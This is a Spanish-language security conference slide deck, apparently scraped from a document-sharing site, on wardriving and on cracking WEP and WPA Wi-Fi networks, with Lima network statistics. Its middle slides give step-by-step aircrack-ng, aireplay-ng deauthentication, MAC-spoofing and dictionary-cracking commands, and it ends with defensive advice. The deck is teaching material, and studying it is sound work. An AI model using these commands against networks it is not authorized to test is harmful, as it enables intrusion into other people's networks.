Está en la página 1de 28

Omar Palomino - CEH

Consultor en Seguridad de Informacin

aula H4XOR

Omar Palomino

Wardriving and wireless penetration testing


Estadsticas de seguridad en Lima Metropolitana Tcnicas para penetrar redes WEP Tcnicas para penetrar redes WPA Demostracin en vivo

Quin soy?
Ing. Sistemas y Maestrista de Ing. de Computacin y Sistemas Consultor en Seguridad de informacin - Digiware, CEH 10 aos de experiencia en seguridad de informacin Psiclogo que aun no comienza sus estudios. Escritor en mis tiempos libres: http://www.el-palomo.com

Qu es Wardriving?
Es la bsqueda de redes inalmbricas Wi-Fi desde un vehculo en movimiento. Cuando se realiza la misma actividad caminando se le llama warwalking.

Qu es Wardriving?
Los hackers pintaban seales en las calles para documentar las redes encontradas.

Warchalking!!
Es un lenguaje de smbolos normalmente escritos en las paredes que informa a los posibles interesados de la existencia de una red inalmbrica.

Se entendi?
Si encuentro una red inalmbrica WEP llamada Homero, cmo lo graficaras?
HOMERO

2 MB

Nunca has visto esos smbolos?


En la actualidad se usan dispositivos GPS y GoogleEarth para documentar las redes encontradas.

Nunca has visto esos smbolos?

Nunca has visto esos smbolos?


Inicio del proyecto: 01 Abril, 2011 Distritos: Cercado Callao Crditos: Agradecimiento a Adrian Rodrguez por San Isidro haber comenzado el proyecto en el San Miguel 2010 y por ser el gestor de esta idea. Miraflores La Molina Los Olivos San Borja

Proyecto Wardriving

Proyecto Wardriving
Redes WiFi Lima Metropolitana
1%

29%

WEP: 28 531 redes WPA :11 713 redes Abiertas: 322 redes
70%

WEP

WPA

Abiertas

Proyecto Wardriving

DEMOSTRACIN DE WARDRIVING

Es posible hackear redes WIFI?


WIRELESS

WPA WEP Home Enterprise

S, se puede hackear. Capturar 40 mil 120 mil paquetes Tarda entre 10 min 20 min

Depende de la complejidad de la contrasea. Rainbow tables Tiempo indeterminado

Qu necesito?
Para vulnerar redes inalmbricas se utilizan diversos vectores de ataque, como la inyeccin de cdigo de paquetes, para la inyeccin de paquetes necesitamos algunos chipset:
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

Requerimientos: Chipset Realtek Antena 9 DBI Android 2.1

Caractersticas WEP

RC4 = Rivest Cipher #4 Ataques FMS optimizado H1KARI Ataques KoreK (IVs nicos) 2004 se publica Aircrack poniendo en prctica los ataques KoreK La incorporacin de inyeccin de paquetes mejor sustancialmente los tiempos

Caractersticas WPA

WPA Modo Enterprise Modo Personal Autenticacin 802.1X / EAP Encriptacin TPKI / MIC Autenticacin: PSK Encriptacin TPKI / MIC

WPA2 Autenticacin 802.1x / EAP Encriptacin AES - CCMP Autenticacin: PSK Encriptacin AES - CCMP

Vulnerando redes WEP

Vamos a la prctica en vivo

Vulnerando redes WEP


Capturando paquetes
Shell# Airmong ng Shell# macchanger mac 00:11:22:33:44:55 Shell# airmong start wlan0 <channel> Shell# airodump-ng mon0 Shell# airodump-ng c <channel> -w <file> --bssid <bssid> mon0 Inyectando paquetes Shell# aireplay-ng -1 0 a <bssid> -h 00:11:22:33:44:55 mon0 Shell# aireplay-ng -3 b <bssid> -h 00:11:22:33:44:55 mon0 Obteniendo la contrasea Shell# aircrak-ng b <bssid> <file.cap>

Vulnerando redes WEP

Vulnerando redes WPA

Vamos a la prctica en vivo

Vulnerando redes WPA


PSK= PMK = PBKDF2 (frase, SSID, longitud SSID 4096,256)

Capturamos slo el Handshake Ataque 0 deautenticacin Shell# aireplay 0 5 a 00:30:BD:98:CE:62 C 00:15:E9:B1:33:53 mon0 -0 = ataque de des-autenticacin 5 = nmero de segundos que durar el ataque -a = BSSID del AP -c = mac del cliente

Vulnerando redes WPA


Comprobamos que hemos capturado el handshake: Shell# aircrak-ng <file.cap>

Necesitamos un diccionario!

4 Mtodos de cracking
1. Aircrack + Diccionario Shell# aircrak-ng w <diccionario_ruta> <handshake.cap>

2. Cowpatty + Diccionario (excesivo procesamiento) Shell# cowpatty f <diccionario_ruta> -r <handshake.cap> -s SSID


3. Cowpatty + genpmk (muy rpido, 20000 palabras por segundo) Shell# genpmk f <diccionario_ruta> -d HASHFILE s SSID Shell# cowpatty r <handshake.cap> -d HASHFILE

SSID

4. John the Ripper Shell# cd /pentest/passwords/John/ Shell# John incremental=digits - - stdout | aircrack-ng -e Homero a 2 -w /root/handshake

Cmo evito que me hackeen?

Olvdate de WEP, ni siquiera lo pienses!! S, a ti te digo! Utiliza WPA con una contrasea con criterios de dificultad. Si estas asegurando una empresa utiliza WPA Enterprise Filtrado MAC y ocultar el SSID, tampoco lo pienses! Existen algunas soluciones que brindan WIDS/WIPS

Gracias por participar muy pronto estamos en provincias para ms informacin ingresa a nuestra web

En el 2012 mucho ms de nosotros

omarc320@gmail.com

También podría gustarte